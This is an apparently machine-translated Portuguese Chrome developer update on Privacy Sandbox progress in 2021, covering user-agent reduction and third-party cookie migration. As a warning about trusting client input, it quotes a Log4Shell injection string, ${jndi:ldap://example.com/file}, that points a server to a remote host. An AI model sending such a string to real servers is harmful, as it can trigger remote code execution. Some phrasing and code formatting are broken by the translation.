Esta é a edição de encerramento de 2021 do Progress in the Privacy sandbox, acompanhando os marcos no caminho para a descontinuação gradual dos cookies de terceiros no Chrome e na busca por uma da Web particular. Normalmente, compartilhamos uma visão geral das atualizações do Sandbox de privacidade linha do tempo com notícias de todos no projeto, mas dezembro foi um mês tranquilo. Em vez disso, veremos alguns atividades ao longo de 2021 e fornecer algumas resoluções em potencial que você pode neste ano novo.
Processo de desenvolvimento do Chromium
Para que um novo recurso de plataforma da Web seja lançado no Chromium, ele precisa passar pelo de desenvolvimento aberto do projeto de análise de dados. Em 2021, os A equipe do Sandbox de privacidade produziu:
| 🥚 | Intenção de prototipar | 19 |
| 🧪 | Intenção de fazer experimentos | 7 |
| 🚀 | Intenção de envio | 11 |
Cada marco também é um convite para que todo o ecossistema da Web possa contribuir.
Uma Intent para protótipo é o primeiro ponto de verificação, onde convidamos a discussão e experimentos iniciais. Isso significa que uma proposta estará disponível no GitHub, nos quais você pode fazer uma pergunta criando um problema ou participar de discussões e apresentações em padrões grupos, como W3C e o IETF. A programação também começa aqui, o que significa que esperamos que os que a funcionalidade de protótipo seja disponibilizada para testes com desenvolvedores recurso . O feedback inicial é fundamental para validar e iterar as propostas.
Uma intenção de fazer experimentos é uma etapa opcional se quisermos solicitar uma teste de origem. Os desenvolvedores podem se inscrever na origem o teste de um recurso e o teste na produção. É chamado de experimento porque temos aspectos específicos do recurso e quer validar em ambientes reais. Os desenvolvedores que podem testar e compartilhar os resultados desses testes para oferecer um feedback valioso que ajude a iterar e aprimorar o recurso.
Uma intent de envio é o marco final que sinaliza que um recurso está completos e prontos para disponibilidade geral. Depois de aprovado, o recurso é mesclado em uma próxima versão e avança para as APIs Canary, Beta, e Stable. É fundamental testar seus sites com a Canário e Versões Beta do Chrome para detectar e informar bugs antes que um recurso chegue ao Stable.
Propostas
Cada proposta do Sandbox de privacidade tem um repositório do GitHub associado. Um contém uma explicação para resumir a funcionalidade geral, uma explicação especificação para implementação por navegadores e contribuições de toda a ecossistema da Web na forma de problemas e solicitações de envio.
Em 14 repositórios do Sandbox de privacidade, tivemos:
| 💬 | 545 | Problemas criados |
| 250 | Problemas encerrados | |
| 🛠️ | 261 | Solicitações de envio criadas |
| 223 | Solicitações de envio mescladas |
A linguagem nas explicações e especificações geralmente é direcionada a um público-alvo já conhece os padrões e o desenvolvimento de navegadores, que podem ser desafiador se não estiver familiarizado com isso. No entanto, o objetivo de uma explicação explicar. Se houver pontos que não estiverem claros ou não forem abordados, queremos que você informar um problema para que possamos atualizar e esclarecer a questão.
de pDNS
Limpeza de primavera do user agent
Como estávamos fazendo a contagem regressiva para o Ano Novo, também estamos contando até os dois O Chrome 100 e a redução incremental da string do user agent. Esta é uma boa a revisitar qualquer uso da string user agent no seu código para verificar se ele pode ser afetado por uma dessas mudanças.
Para encontrar essas áreas:
- Procure
navigator.userAgentno seu código JavaScript ou acesse aUser-Agentno código do servidor. - Verifique a análise da string para ver suposições sobre uma versão de dois dígitos. Para
exemplo, um regex que especifica
\d\dou\d{2}deve ser substituído por\d+ - Verifique se a string é usada em qualquer lugar em que você depende de:
- versão da plataforma (sistema operacional)
- versão completa do Chrome
- nome do dispositivo móvel
- Esses são os valores que serão reduzidos a strings fixas no futuro. Se se você precisar de acesso a esses valores, migre para o cliente user agent Dicas.
Há uma atualização de dezembro para mencionar, se você estiver adotando o cliente user agent
Dicas, enviamos a Intent de envio para ativar a delegação de dicas a outros
origens em
HTML
usando uma tag <meta>. Exemplo:
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
Se você gosta de fazer faxinas com vontade de fazer faxina, alternativas ao uso do user agent completamente. Se você estiver usando a string para detectar dispositivos móveis e investigar se é possível substituí-lo por do projeto. Se você está verificando o nome e a versão do navegador para oferecer suporte a recursos, consulte se você puder usar a detecção de recursos.
É sempre bom lembrar que o user agent, como qualquer cliente fornecido
valor, não é garantido que seja preciso ou mesmo fornecido. O recente Log4j
vulnerabilidade "Log4shell"
fornece um exemplo desse risco. Um cliente que define sua string de user agent como
inclua um valor como ${jndi:ldap://example.com/file} pode conseguir conseguir um site
analisar isso ativamente no servidor.
Catalogação de cookies
Outra atividade tradicional de ano-novo é garantir que você esteja feliz por
uma quantidade saudável de biscoitos com ingredientes de qualidade. Conforme seguimos em frente
para a desativação dos cookies de terceiros, você precisa conhecer
quais cookies do seu site serão afetados. 2020 deu uma vantagem, já que
necessárias para marcar todos os cookies de tags de tráfego
usar
com SameSite=None.
Qualquer cookie em que você tenha definido o atributo SameSite como None precisará de uma
atualizar.
Existem três rotas possíveis a serem consideradas no momento:
- Se o cookie só for exigido em uma relação individual com o site de nível superior,
e acompanhe o progresso dos CHIPS
proposta. Isso significa adicionar
Partitionedao cookie. - Se o cookie for usado em um contexto entre sites, mas somente em sites nos quais você
próprios e operar, talvez ele seja um candidato para a certificação Própria
Conjuntos. Isso requer a definição da
no conjunto e adicionar o atributo
SamePartyao cookie. - Se o cookie é usado para fornecer alguma forma de valor compartilhado em vários sites, analise o conjunto mais amplo do Sandbox de privacidade propostas para uma solução alternativa que não dependem do rastreamento entre sites.
Se você se sente preocupada com a saúde, este também é o momento ideal revisite o uso de cookies, porque temos uma boa receita para melhorar sua cookies primários.
Feedback
À medida que continuarmos a publicar essas atualizações mensais e avançarmos na Sandbox de privacidade como um todo, queremos garantir que os desenvolvedores recebam as informações e o suporte de que precisam. Conte para nós em @ChromiumDev no Twitter, se pudermos ajudar melhorar com a série. Usaremos suas respostas para continuar melhorando o formato.
Confira as perguntas frequentes sobre o Sandbox de privacidade, continuam a se expandir com base nos problemas que você envia ao suporte ao desenvolvedor repositório. Se você tiver dúvidas sobre o teste ou a implementação de qualquer uma das propostas, venha falar com a gente lá.